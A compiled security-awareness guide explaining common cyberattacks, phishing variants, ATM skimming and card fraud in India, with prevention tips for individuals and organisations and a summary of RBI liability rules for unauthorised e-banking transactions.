Cyber Attack and Prevention Tips

A cyberattack is deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyberattacks use malicious code to alter computer code, logic or data, resulting in disruptive consequences that can compromise data and lead to cybercrimes, such as information and identity theft.

Cyberattack is also known as a computer network attack (CNA).

Cyberattacks may include the following consequences:

• Identity theft, fraud, extortion
• Malware, pharming, phishing, spamming, spoofing, spyware, Trojans and viruses
• Stolen hardware, such as laptops or mobile devices
• Denial-of-service and distributed denial-of-service attacks
• Breach of access
• Password sniffing
• System infiltration
• Website defacement
• Private and public Web browser exploits
• Instant messaging abuse
• Intellectual property (IP) theft or unauthorized access

The Institute for Security Technology Studies at Dartmouth University researches and investigates cyberattack issues facing law enforcement investigations and focuses on the continuous development of IP tracing, data analysis, real-time interception and national data sharing.

Keep your computer current with the latest patches and updates.

One of the best ways to keep attackers away from your computer is to apply patches and other software fixes when they become available. By regularly updating your computer, you block attackers from being able to take advantage of software flaws (vulnerabilities) that they could otherwise use to break into your system. 

While keeping your computer up-to-date will not protect you from all attacks, it makes it much more difficult for hackers to gain access to your system, blocks many basic and automated attacks completely, and might be enough to discourage a less-determined attacker to look for a more vulnerable computer elsewhere. 

More recent versions of Microsoft Windows and other popular software can be configured to download and apply updates automatically so that you do not have to remember to check for the latest software. Taking advantage of "auto-update" features in your software is a great start toward keeping yourself safe online. 

Make sure your computer is configured securely.

Keep in mind that a newly purchased computer may not have the right level of security for you. When you are installing your computer at home, pay attention not just to making your new system function, but also focus on making it work securely. 

Configuring popular Internet applications such as your Web browser and email software is one of the most important areas to focus on. For example, settings in your Web browser such as Internet Explorer or Firefox will determine what happens when you visit Web sites on the Internet—the strongest security settings will give you the most control over what happens online but may also frustrate some people with a large number of questions ("This may not be safe, are you sure you want do this?") or the inability to do what they want to do. 

Choosing the right level of security and privacy depends on the individual using the computer. Oftentimes security and privacy settings can be properly configured without any sort of special expertise by simply using the "Help" feature of your software or reading the vendor's Web site. If you are uncomfortable configuring it yourself consult someone you know and trust for assistance or contact the vendor directly. 

Choose strong passwords and keep them safe.

Passwords are a fact of life on the Internet today—we use them for everything from ordering flowers and online banking to logging into our favorite airline Web site to see how many miles we have accumulated. The following tips can help make your online experiences secure: 

• Selecting a password that cannot be easily guessed is the first step toward keeping passwords secure and away from the wrong hands. Strong passwords have eight characters or more and use a combination of letters, numbers and symbols (e.g., # $ % ! ?). Avoid using any of the following as your password: your login name, anything based on your personal information such as your last name, and words that can be found in the dictionary. Try to select especially strong, unique passwords for protecting activities like online banking.
• Keep your passwords in a safe place and try not to use the same password for every service you use online.
• Change passwords on a regular basis, at least every 90 days. This can limit the damage caused by someone who has already gained access to your account. If you notice something suspicious with one of your online accounts, one of the first steps you can take is to change your password.

Protect your computer with security software.

Several types of security software are necessary for basic online security. Security software essentials include firewall and antivirus programs. A firewall is usually your computer's first line of defense-it controls who and what can communicate with your computer online. You could think of a firewall as a sort of "policeman" that watches all the data attempting to flow in and out of your computer on the Internet, allowing communications that it knows are safe and blocking "bad" traffic such as attacks from ever reaching your computer. 

The next line of defense many times is your antivirus software, which monitors all online activities such as email messages and Web browsing and protects an individual from viruses, worms, Trojan horse and other types malicious programs. More recent versions of antivirus programs, such as Norton AntiVirus, also protect from spyware and potentially unwanted programs such as adware. Having security software that gives you control over software you may not want and protects you from online threats is essential to staying safe on the Internet. Your antivirus and antispyware software should be configured to update itself, and it should do so every time you connect to the Internet. 

Integrated security suites such as  Internet Security Antivirus combine firewall, antivirus, antispyware with other features such as antispam and parental controls have become popular as they offer all the security software needed for online protection in a single package. Many people find using a security suite an attractive alternative to installing and configuring several different types of security software as well as keeping them all up-to-date. 

Protect your personal information.

Exercise caution when sharing personal information such as your name, home address, phone number, and email address online. To take advantage of many online services, you will inevitably have to provide personal information in order to handle billing and shipping of purchased goods. Since not divulging any personal information is rarely possible, the following list contains some advice for how to share personal information safely online: 

• Keep an eye out for phony email messages. Things that indicate a message may be fraudulent are misspellings, poor grammar, odd phrasings, Web site addresses with strange extensions, Web site addresses that are entirely numbers where there are normally words, and anything else out of the ordinary. Additionally, phishing messages will often tell you that you have to act quickly to keep your account open, update your security, or urge you to provide information immediately or else something bad will happen. Don't take the bait.
• Don't respond to email messages that ask for personal information. Legitimate companies will not use email messages to ask for your personal information. When in doubt, contact the company by phone or by typing in the company Web address into your Web browser. Don't click on the links in these messages as they make take you to a fraudulent, malicious Web sites.
• Steer clear of fraudulent Web sites used to steal personal information. When visiting a Web site, type the address (URL) directly into the Web browser rather than following a link within an email or instant message. Fraudsters often forge these links to make them look convincing. A shopping, banking or any other Web site where sensitive information should have an "S" after the letters "http" (i.e. https://www.yourbank.com not http://www.yourbank.com)/. The "s" stands for secure and should appear when you are in an area requesting you to login or provide other sensitive data. Another sign that you have a secure connection is the small lock icon in the bottom of your web browser (usually the right-hand corner).
• Pay attention to privacy policies on Web sites and in software. It is important to understand how an organization might collect and use your personal information before you share it with them.
• Guard your email address. Spammers and phishers sometimes send millions of messages to email addresses that may or may not exist in hopes of finding a potential victim. Responding to these messages or even downloading images ensures you will be added to their lists for more of the same messages in the future. Also be careful when posting your email address online in newsgroups, blogs or online communities.

Online offers that look too good to be true usually are.

The old saying "there's no such thing as a free lunch" still rings true today. Supposedly "free" software such as screen savers or smileys, secret investment tricks sure to make you untold fortunes, and contests that you've surprisingly won without entering are the enticing hooks used by companies to grab your attention. 

While you may not directly pay for the software or service with money, the free software or service you asked for may have been bundled with advertising software ("adware") that tracks your behavior and displays unwanted advertisements. You may have to divulge personal information or purchase something else in order to claim your supposed content winnings. If an offer looks so good it's hard to believe, ask for someone else's opinion, read the fine print, or even better, simply ignore it. 

Review bank and credit card statements regularly.

The impact of identity theft and online crimes can be greatly reduced if you can catch it shortly after your data is stolen or when the first use of your information is attempted. One of the easiest ways to get the tip-off that something has gone wrong is by reviewing the monthly statements provided by your bank and credit card companies for anything out of the ordinary. 

Additionally, many banks and services use fraud prevention systems that call out unusual purchasing behavior (i.e. if you live in Texas and all of the sudden start buying refrigerators in Budapest). In order to confirm these out of the ordinary purchases, they might call you and ask you to confirm them. Don't take these calls lightly-this is your hint that something bad may have happened and you should consider pursuing some of the activities mentioned in the area covering how to respond if you have become a victim. 

What is phishing

Phishing is a form of fraud in which the attacker tries to learn information such as login credentials or account information by masquerading as a reputable entity or person in email, IM or other communication channels.

Typically a victim receives a message that appears to have been sent by a known contact or organization. An attachment or links in the message may install malware on the user’s device or direct them to a malicious website set up to trick them into divulging personal and financial information, such as passwords, account IDs or credit card details. Phishing is a homophone of fishing, which involves using lures to catch fish.

Phishing is popular with cybercriminals, as it is far easier to trick someone into clicking a malicious link in a seemingly legitimate email than trying to break through a computer’s defenses. Although some phishing emails are poorly written and clearly fake, sophisticated cybercriminals employ the techniques of professional marketers to identify the most effective types of messages --  the phishing "hooks" that get the highest "open" or click through rate and the Facebook posts that generate the most likes. Phishing campaigns are often built around the year's major events, holidays and anniversaries, or take advantage of breaking news stories, both true and fictitious.

To make phishing messages look like they are genuinely from a well-known company, they include logos and other identifying information taken directly from that company’s website. The malicious links within the body of the message are designed to make it appear that they go to the spoofed organization. The use of subdomains and misspelled URLs (typosquatting) are common tricks, as is homograph spoofing -- URLs created using different logical characters to read exactly like a trusted domain. Some phishing scams use JavaScript to place a picture of a legitimate URL over a browser’s address bar. The URL revealed by hovering over an embedded link can also be changed by using JavaScript.

Spear phishing attacks are directed at specific individuals or companies, while incidents that specifically target senior executives within an organization are termed whaling attacks. Those preparing a spear phishing campaign research their victims in detail in order to create a more genuine message, as using information relevant or specific to a target increases the chances of the attack being successful. Phishers use social networking and other sources of information to gather background information about the victim’s personal history, their interests and activities. Names, job titles and email addresses of colleagues and key company employees are verified, as are vacations. This information is then used to craft a believable email. Targeted attacks and advanced persistent threats (APTs) typically start with a spear phishing email containing a malicious link or attachment.

A gateway email filter can trap a lot of mass targeted phishing emails, reducing the number of phishing emails that reach users’ inboxes. Ensure your own mail servers make use of one of the main authentication standards; Sender ID or DomainKeys will help cut out spoofed email too. A Web security gateway can also provide another layer of defense by preventing users from reaching the target of a malicious link. They work by checking requested URLs against a constantly updated database of sites suspected of distributing malware.

There are plenty of resources on the Internet that provide help in combating phishing. The Anti-Phishing Working Group Inc. and the federal government’s OnGuardOnline.gov  website both provide advice on how to spot, avoid and report phishing attacks. Interactive training aids such as Wombat Security Technologies' Anti-Phishing Training Suite or PhishMe can help teach employees how to avoid phishing traps, while sites like FraudWatch International and MillerSmiles publish the latest phishing email subject lines that are circulating the Internet

There are Six common attacks of phishing.

At this year’s RSA Conference, Tripwire conducted a survey where it asked 200 security professionals to weigh in on the state of phishing attacks.

More than half (58 percent) of respondents stated their organizations had seen an increase in phishing attacks in the past year. Despite that increase, most companies didn’t feel prepared to protect themselves against phishing scams. Indeed, a slight majority (52 percent) stated they were “not confident” in their executives’ ability to successfully spot a phishing scam.

The growth of phishing attacks in both frequency and sophistication, as noted by Verizon in its 2016 Data Breach Investigations Report, poses a significant threat to all organizations. It’s important that all companies know how to spot some of the most common phishing scams if they are to protect their corporate information.

With that in mind, I will use a guide developed by CloudPages to discuss six common phishing attacks: deceptive phishing, spear phishing, CEO fraud, pharming, Dropbox phishing, and Google Docs phishing. I will then provide some useful tips on how organizations can protect themselves against these phishing scams.

1. DECEPTIVE PHISHING

The most common type of phishing scam, deceptive phishing refers to any attack by which fraudsters impersonate a legitimate company and attempt to steal people’s personal information or login credentials. Those emails frequently use threats and a sense of urgency to scare users into doing the attackers’ bidding.

For example, PayPal scammers might send out an attack email that instructs them to click on a link in order to rectify a discrepancy with their account. In actuality, the link leads to a fake PayPal login page that collects a user’s login credentials and delivers them to the attackers.

The success of a deceptive phish hinges on how closely the attack email resembles a legitimate company’s official correspondence. As a result, users should inspect all URLs carefully to see if they redirect to an unknown website. They should also look out for generic salutations, grammar mistakes, and spelling errors scattered throughout the email.

2. SPEAR PHISHING

Not all phishing scams lack personalization – some use it quite heavily.

For instance, in spear phishing scams, fraudsters customize their attack emails with the target’s name, position, company, work phone number and other information in an attempt to trick the recipient into believing that they have a connection with the sender.

The goal is the same as deceptive phishing: lure the victim into clicking on a malicious URL or email attachment, so that they will hand over their personal data.

Spear-phishing is especially commonplace on social media sites like LinkedIn, where attackers can use multiple sources of information to craft a targeted attack email.

To protect against this type of scam, organizations should conduct ongoing employee security awareness training that, among other things, discourages users from publishing sensitive personal or corporate information on social media. Companies should also invest in solutions that are capable of analyzing inbound emails for known malicious links/email attachments.

3. CEO FRAUD

Spear phishers can target anyone in an organization, even top executives. That’s the logic behind a “whaling” attack, where fraudsters attempt to harpoon an executive and steal their login credentials.

In the event their attack proves successful, fraudsters can choose to conduct CEO fraud, the second phase of a business email compromise (BEC) scam where attackers impersonate an executive and abuse that individual’s email to authorize fraudulent wire transfers to a financial institution of their choice.

Whaling attacks work because executives often don’t participate in security awareness training with their employees. To counter that threat, as well as the risk of CEO fraud, all company personnel – including executives – should undergo ongoing security awareness training.

Organizations should also consider amending their financial policies, so that no one can authorize a financial transaction via email.

4. PHARMING

As users become more savvy to traditional phishing scams, some fraudsters are abandoning the idea of “baiting” their victims entirely. Instead, they are resorting to pharming – a method of attack which stems from domain name system (DNS) cache poisoning.

The Internet’s naming system uses DNS servers to convert alphabetical website names, such as “www.microsoft.com,” to numerical IP addresses used for locating computer services and devices.

Under a DNS cache poisoning attack, a pharmer targets a DNS server and changes the IP address associated with an alphabetical website name. That means an attacker can redirect users to a malicious website of their choice even if the victims entered in the correct website name.

To protect against pharming attacks, organizations should encourage employees to enter in login credentials only on HTTPS-protected sites. Companies should also implement anti-virus software on all corporate devices and implement virus database updates, along with security upgrades issued by a trusted Internet Service Provider (ISP), on a regular basis.

5. DROPBOX PHISHING

While some phishers no longer bait their victims, others have specialized their attack emails according to an individual company or service.

Take Dropbox, for example. Millions of people use Dropbox every day to back up, access and share their files. It’s no wonder, therefore, that attackers would try to capitalize on the platform’s popularity by targeting users with phishing emails.

One attack campaign, for example, tried to lure users into entering their login credentials on a fake Dropbox sign-in page hosted on Dropbox itself.

To protect against Dropbox phishing attacks, users should consider implementing two-step verification (2SV) on their accounts. 

6. GOOGLE DOCS PHISHING

Fraudsters could choose to target Google Drive similar to the way they might prey upon Dropbox users.

Specifically, as Google Drive supports documents, spreadsheets, presentations, photos and even entire websites, phishers can abuse the service to create a web page that mimics the Google account log-in screen and harvests user credentials.

A group of attackers did just that back in July of 2015. To add insult to injury, not only did Google unknowingly host that fake login page, but a Google SSL certificate also protected the page with a secure connection.

Once again, users should consider implementing 2SV to protect themselves against this type of threat. They can enable the security feature via either SMS messaging or the Google Authenticator app.

CONCLUSION

Using the guide above, organizations will be able to more quickly spot some of the most common types of phishing attacks. But that doesn’t mean they will be able to spot each and every phish. On the contrary, phishing is constantly evolving to adopt new forms and techniques.

With that in mind, it’s imperative that organizations conduct security awareness training on an ongoing basis so that their employees and executives stay on top of emerging phishing attacks.

PHISHING ATTACKS WHAT IS A PHISHING ATTACK

Phishing is a type of social engineering attack often used to steal user data, including login credentials and credit card numbers. It occurs when an attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message. The recipient is then tricked into clicking a malicious link, which can lead to the installation of malware, the freezing of the system as part of a ransomware attack or the revealing of sensitive information.

An attack can have devastating results. For individuals, this includes unauthorized purchases, the stealing of funds, or identify theft.

Moreover, phishing is often used to gain a foothold in corporate or governmental networks as a part of a larger attack, such as an advanced persistent threat (APT) event. In this latter scenario, employees are compromised in order to bypass security perimeters, distribute malware inside a closed environment, or gain privileged access to secured data.

An organization succumbing to such an attack typically sustains severe financial losses in addition to declining market share, reputation, and consumer trust. Depending on scope, a phishing attempt might escalate into a security incident from which a business will have a difficult time recovering.

PHISHING ATTACK EXAMPLES

The following illustrates a common phishing scam attempt:

• A spoofed email ostensibly from myuniversity.edu is mass-distributed to as many faculty members as possible.
• The email claims that the user’s password is about to expire. Instructions are given to go to myuniversity.edu/renewal to renew their password within 24 hours.

Several things can occur by clicking the link. For example:

• The user is redirected to myuniversity.edurenewal.com, a bogus page appearing exactly like the real renewal page, where both new and existing passwords are requested. The attacker, monitoring the page, hijacks the original password to gain access to secured areas on the university network.
• The user is sent to the actual password renewal page. However, while being redirected, a malicious script activates in the background to hijack the user’s session cookie. This results in a reflected XSS attack, giving the perpetrator  privileged access to the university network.

PHISHING TECHNIQUES

EMAIL PHISHING SCAMS

Email phishing is a numbers game. An attacker sending out thousands of fraudulent messages can net significant information and sums of money, even if only a small percentage of recipients fall for the scam. As seen above, there are some techniques attackers use to increase their success rates.
For one, they will go to great lengths in designing phishing messages to mimic actual emails from a spoofed organization. Using the same phrasing, typefaces, logos, and signatures makes the messages appear legitimate.
In addition, attackers will usually try to push users into action by creating a sense of urgency. For example, as previously shown, an email could threaten account expiration and place the recipient on a timer. Applying such pressure causes the user to be less diligent and more prone to error.
Lastly, links inside messages resemble their legitimate counterparts, but typically have a misspelled domain name or extra subdomains. In the above example, the myuniversity.edu/renewal URL was changed to myuniversity.edurenewal.com. Similarities between the two addresses offer the impression of a secure link, making the recipient less aware that an attack is taking place.


SPEAR PHISHING

Spear phishing targets a specific person or enterprise, as opposed to random application users. It's a more in depth version of phishing that requires special knowledge about an organization, including its power structure.
An attack might play out as follows:
• A perpetrator researches names of employees within an organization’s marketing department and gains access to the latest project invoices.
• Posing as the marketing director, the attacker emails a departmental project manager (PM) using a subject line that reads, Updated invoice for Q3 campaigns. The text, style, and included logo duplicate the organization’s standard email template.
• A link in the email redirects to a password-protected internal document, which is in actuality a spoofed version of a stolen invoice.
• The PM is requested to log in to view the document. The attacker steals his credentials, gaining full access to sensitive areas within the organization’s network.
By providing an attacker with valid login credentials, spear phishing is an effective method for executing the first stage of an APT.

PHISHING PROTECTION

Phishing attack protection requires steps be taken by both users and enterprises.

For users, vigilance is key. A spoofed message often contains subtle mistakes that expose its true identity. These can include spelling mistakes or changes to domain names, as seen in the earlier URL example. Users should also stop and think about why they’re even receiving such an email.

For enterprises, a number of steps can be taken to mitigate both phishing and spear phishing attacks:

• Two-factor authentication (2FA) is the most effective method for countering phishing attacks, as it adds an extra verification layer when logging in to sensitive applications. 2FA relies on users having two things: something they know, such as a password and user name, and something they have, such as their smartphones. Even when employees are compromised, 2FA prevents the use of their compromised credentials, since these alone are insufficient to gain entry.
• In addition to using 2FA, organizations should enforce strict password managment policies. For example, employees should be required to frequently change their passwords and to not be allowed to reuse password for multiple applications.
• Educational campaigns can also help diminish the threat of phishing attacks by enforcing secure practices, such as not clicking on extrenal email links.

PHISHING PROTECTION FROM IMPERVA INCAPSULA

Imperva Incapsula offers a combination of access management and web application security solutions to counter phishing attempts:
• Incapsula Login Protect lets you deploy 2FA protection for URL addresses in your website or web application. This includes addresses having URL parameters or AJAX pages, where 2FA protection is normally harder to implement. The solution can be deployed in seconds with just a few clicks of a mouse. It doesn’t require any hardware or software installation and enables easy management of user roles and privileges directly from your Incapsula dashboard.
• Working within the cloud, Incapsula Web Application Firewall (WAF) blocks malicious requests at the edge of your network. This includes preventing malware injection attempts by compromised insiders in addition to reflected XSS attacks deriving from a phishing episode.

E-banking fraud: What’s your liability?

The bank will reimburse the customer if there is a fraud/negligence on the part of the bank, whether or not you report the fraud/loss.

According to the Reserve Bank of India (RBI) draft guidelines issued on August 11, 2016, the burden of proving customer liability in an unauthorised e-banking transaction lies with the bank. Find out when you incur nil or limited liability. 

When is it zero liability? 
The bank will reimburse the customer if there is: 
a Fraud/negligence on the part of the bank, whether or not you report the fraud/loss. 

b Third party breach, where the fault lies neither with the bank nor with the customer, but elsewhere in the system, and the customer notifies the bank within three working days of receiving the communication from the bank regarding an unauthorised transaction. 

When is it limited liability? 
The customer is partially liable if: 
a It involves negligence on his part, like sharing payment credentials. In such a case, he will bear the entire loss until he reports the unauthorised transaction to the bank. Any loss after reporting will be borne by the bank. 

b The fault lies neither with the bank nor with the customer but in the system and there is a delay of four to seven working days by the customer in notifying the bank. The customer liability shall be limited to the transaction value or Rs 5,000, whichever is lower. 

Credit, debit card frauds and how you can avoid them

Even as the RBI and banks are introducing several security features, customers need to take the initiative to prevent being conned.

On 19 October, the country woke up to a banking nightmare. The State Bank of India (SBI) blocked 6 lakh debit cards after a reported malware-related breach in a non-SBI ATM network. In what is possibly India’s largest financial data breach, nearly 32 lakh debit cards across 19 banks, including HDFC Bank, ICICI Bank and Axis Bank, were compromised. As per the National Payments Corporation of India (NPCI), 90 ATMs were impacted and at least 641 customers lost Rs 1.3 crore in fraudulent transactions.

Even as the council of Payment Card Industry Data Security Standard (PCI-DSS), an international body that sets data security standards, has ordered a forensic audit, banks have advised their customers to change PINs and confine themselves to own bank ATMs. The customers, meanwhile, are worried about how secure their debit and credit cards really are.

It’s a justified concern, considering that nearly 2.59 crore credit cards issued by 56 banks had a transaction worth Rs 24,341 crore via points of sale (POS) and Rs 202 crore through ATMs, while 69.72 crore debit cards registered transactions worth Rs 2.19 lakh crore through ATMs and Rs 17,100 crore via POS in July 2016. This is a fortune that fraudsters are waiting to tap into through several, ready loopholes. “Banks are definitely revisiting their network security by applying additional layers of security to prevent any compromise,” says Rajiv Anand, Executive Director, Axis Bank. 

Even as the RBI and banks are trying to stay one step ahead by introducing several security features, including chip-based cards and two-factor authentication, customers need to take the initiative to prevent being conned. We list here the various ways that cards, credit and debit, can be used to commit fraud and steps you can take to steer clear of these. 

HOW YOU CAN BE DUPED 
Card fraud basically involves theft of identity or information on your cards. This information is then used to make ATM withdrawals or conduct online or offline transactions. The stealing can take place in one of the following ways: 

Automated Teller Machines (ATMs) 
The machines have become a favoured target of scamsters (see 5 traps set up by fraudsters at the ATM ). Ask Mumbai-based Rupali Pandagale (see below), who went for cash withdrawal to another bank’s ATM. “I put the card in one of the machines, but it wasn’t working. So I took out Rs 2,500 from the other machine and left. Five minutes later, I got an alert saying another Rs 10,000 had been withdrawn,” she says. 

Rupali Pandagale 
29 years 
Salaried, Mumbai 
Fraud: ATM withdrawal from other bank machine. 
"I inserted my card in one machine, but it wasn't working. I withdrew Rs 2,500 from the other machine and left. Five minutes later, I got an alert that Rs 10,000 had been withdrawn." 
When: February 2016. 
Amount: Rs 10,000. 
What did she do? 
"I contacted both the banks and asked for video footage, but they refused to share it with me. They insist I conducted the transaction and have failed to remit the amount." 
Current status: Unresolved. 

There are various techniques fraudsters use to steal your card information: 
*Skimming: “This technique involves attaching a data skimming device in the card reader slot to copy information from the magnetic strip when one swipes the card,” says Mohan Jayaraman, Managing Director, Experian India. “They also set up cameras near the machine to get the PIN,” he adds. 

*Card trapping: This is a barb that retains the card when you insert it in the machine and the card is retrieved later. 

*Shoulder surfing: If you find friendly bystanders in the room or outside who try to help you if your card gets stuck or peer over your shoulder, beware. They are there to get you to reveal your PIN. 

*Leaving card/PIN: If you write your PIN on the card and forget it in the ATM kiosk or the machine, it’s a virtual invite to be scammed. 

Online transactions 
The ease of e-shopping or online bill payment is matched by the felicity with which identity theft can be carried out on computer or smartphone. This can then be used for unauthorised transactions. Mumbai-based Girish Peswani (see below) knows it well. “I was in my office when I got alerts about online transactions abroad made using my credit card,” he says. There are various ways this credit card information could have been stolen from Peswani. 

Girish Peswani 
44 years 
IT consultant, Mumbai 
Fraud: Illegal online transactions. 
"I was in my office when I got two alerts showing online transactions on my card in The Netherlands and Australia." 
When: August 2014. 
Amount: Rs 12,000. 
What did he do? 
"I blocked the card and contacted the bank. They asked me to get a new card. I asked them to resolve the issue first, but they continue to send me credit bills for the amount spent and a huge interest amount too." 
Current status: Unresolved. 

*Pharming: In this technique, fraudsters reroute you to a fake website that seems similar to the original. So even as you conduct transactions and make payment via credit or debit card, the card details can be stolen. 

*Keystroke logging: Here, you unintentionally download a software, which allows the fraudster to trace your key strokes and steal passwords or credit card and Net banking details. 

*Public Wi-Fi: If you are used to carrying out transactions on your smartphone, public Wi-Fi makes for a good hacking opportunity for thieves to steal your card details. 

*Malware: This is a malicious software that can damage computer systems at ATMs or bank servers and allows fraudsters to access confidential card data. 

Merchant or point-of-sale theft 
This is perhaps the simplest and most effective form of stealth, wherein your card is taken by the salesperson for swiping and the information from the magnetic strip is copied to be used later for illegal transactions. 

Phishing & vishing 
While phishing involves identity theft through spam mails which seem to be from a genuine source, vishing is essentially the same through a mobile phone using messages or SMS. These trick you into revealing your password, PIN or account number. 

SIM swipe fraud 
Here the fraudster contacts your mobile operator with fake identity proof and gets a duplicate SIM card. The operator deactivates your original SIM and the thief generates one-time password (OTP) on the phone to conduct online transactions. 

Unsafe apps 
Mobile apps other than those from established stores can gain access to information on your phone like passwords, etc, and use it for unauthorised transactions. 

Lost or stolen cards, interception 
This is the oldest form of theft, wherein transactions are carried out using stolen cards, those intercepted from mail before they reach the owner from the card issuer, or by fishing out information like PINs and passwords from trash bins. 

Cards using other documents 
This is also an easy form of identity theft, where new cards are made by the fraudster using personal information that is stolen from application forms or other lost or discarded documents. 

HOW TO PREVENT FRAUD 
Some basic, preventive steps can ensure that you do not fall prey to credit or debit card fraud. Here’s how: 
ATM safeguards 
“Stay away from ATMs that appear dirty or in disrepair. They may not work or, worse, may be fake machines set to capture your card information,” warns Navroze Dastur, Managing Director, NCR India, a financial security solutions firm. Here are some other things you should keep in mind: 
*Check machine: “Do not use ATMs with unusual signage, such as a command to enter you PIN twice to complete the transaction,” says Dastur. “Also watch out for machines that appear to have been altered , if the front looks crooked, loose or damaged. It could be a sign that someone has attached a skimming device,” he adds. 

*Cover keypad: Make sure to cover the keypad with your hand while entering the PIN to escape any cameras attached nearby. 

*Don’t take help: It is advisable to use only your own bank ATMs, particularly those attached to a bank branch and those that have security guards. Also, avoid taking the help of any person loitering outside the ATM or volunteering to assist you if you get stuck.

Online precautions 
*Use safe sites: Go only to well-known, established sites for e-shopping. “Remember to confirm the site’s legitimacy before using it and shop only on those that are Secure Sockets Layer (SSL)-certified. These can be identified through the lock symbol next to the browser’s URL box,” says Porush Singh, Country Corporate Officer, Indian & Division President, South Asia, Mastercard. 

Also make sure that the website uses the ‘https’ protocol instead of ‘http’, where ‘s’ stands for ‘secure’. Additionally, make sure not to click on the option that asks for saving your card details on any site. 

“You should also look out for a site’s payment verification tools, such as MasterCard’s SecureCode, which verifies that you authorised the payment while protecting the privacy of you online transaction,” says Singh. 

*Anti-virus software: While banks deploy ATM network security measures, on an individual level you can safeguard transactions by installing anti-virus software on your computer and smartphone to keep out malware. “You can also install identity theft detection apps on your phone from an official app store,” says Jayaraman of Experian. Besides, have software on your smartphone that enables you to wipe out the data remotely in case the mobile gets stolen. 

*Debit card: Make sure that you do not use your debit card for e-commerce transactions. This is because if your card is compromised, the entire cash in your bank account can be wiped out instantly. The credit card, on the other hand, offers a month’s grace period before the cash leaves your account, during which the investigation can possibly nail the fraud. 

*Hide CVV: When you enter the CVV on the site, it should be masked by asterisks. This is especially important while shopping on foreign websites where the CVV is the only point of verification. Also use a virtual keyboard to avoid keystroke logging. 

*Public Wi-Fi: “Customers must avoid using unsecured W-Fi networks or public Wi-Fi as these are easy targets for identity theft cases in online transactions” says Anand of Axis Bank. 

*Register for alerts: This is a very important step since the bank will alert you to any online card transaction or ATM withdrawals the moment these take place. Also remember to update your mobile contact number in case of a change. 

*Log out: “Always log out from social media sites and other online accounts to ensure data security and avoid storing confidential passwords on your mobile phones as these can be used by fraudsters,” says Jayaraman. 

*Change passwords: Keep changing your passwords from time to time to reduce the probability of identity theft. 

*Virtual cards: You can use this prepaid card if you are not a frequent shopper. It is a limited debit card that does not provide the primary card information to the merchant and expires after a day or 48 hours. 

Offline preventive measures 
Here are some additional precautions you can take to ensure your card is safe. 
*Don’t disclose details: Never reveal your PIN, CVV or password to anyone. Make sure not to respond to e-mails or SMSes that ask for crucial personal or card-related details. No bank or credit card firm is authorised to seek card details from customers on mail or through phone. 

*Check statements: Regularly go through your bank or credit card statements so that you can detect any unauthorised transaction through identity theft and alert the bank immediately. 

*Merchants & POS: At shops or petrol pumps, make sure that the card is not taken by the salesperson to a remote location where you cannot see it as the card information can be easily copied and stolen. Also, try shopping with retailers that use chip-enabled card readers. Though not every merchant has such readers, this provision can help bring down the risk of fraudulent card activity significantly. 

*Don’t sign blank receipts: Ensure that you never sign a blank receipt, and mark through any blank lines or spaces before signing so that nobody can add an additional amount to your transaction. 

WHAT TO DO IF CHEATED 
In case of card identity theft or a fraudulent offline or online transaction, report the loss immediately to the bank or card provider and have the card blocked. For this, make sure that you have the customer care number of your bank handy. Follow it up with a letter or e-mail. It is also advisable to lodge an FIR at the earliest. 

If the bank does not respond within a week, approach the nodal officer. If there is no response from the bank within 30 days, contact the banking ombudsman appointed by the RBI ( https://www.rbi. org.in/commonman/English/Scripts/Against-BankABO.aspx ). If this measure too fails, approach the court of law for redressal. 

5 TRAPS SET BY FRAUDSTERS AT THE ATM 

1. Hidden camera 
Tiny, pinhole cameras may be placed on the machine or even the roof at strategic positions to capture your PIN. 

2. Card skimmer 
These devices are installed on the card reader slot to either copy the information from the magnetic strip of your card or steal the card itself. 
*Bulky slot: If the slot feels slightly bulky or misaligned, in all probability an additional card reader slot has been placed on top of the actual one. 

*Loose slot: If the slot is wobbly or loose, it indicates the presence of a ‘Lebanese loop’, which is a small plastic device with a barb that holds your card back in the machine. You may think the machine has swallowed your card or it has been stuck. 

3. Shoulder surfers 
These are people lurking in the ATM room or outside. They will either peer over your shoulder to read your PIN or offer help if your card is stuck. 

4. False front 
It may be a little difficult to detect as the fake front completely covers the original machine because it is installed on top of it. This allows fraudsters to take your PIN as well as money. 

5. Fake keypad 
This is placed on top of the actual keypad. If the keypad feels spongy to touch or loose, don’t enter your PIN.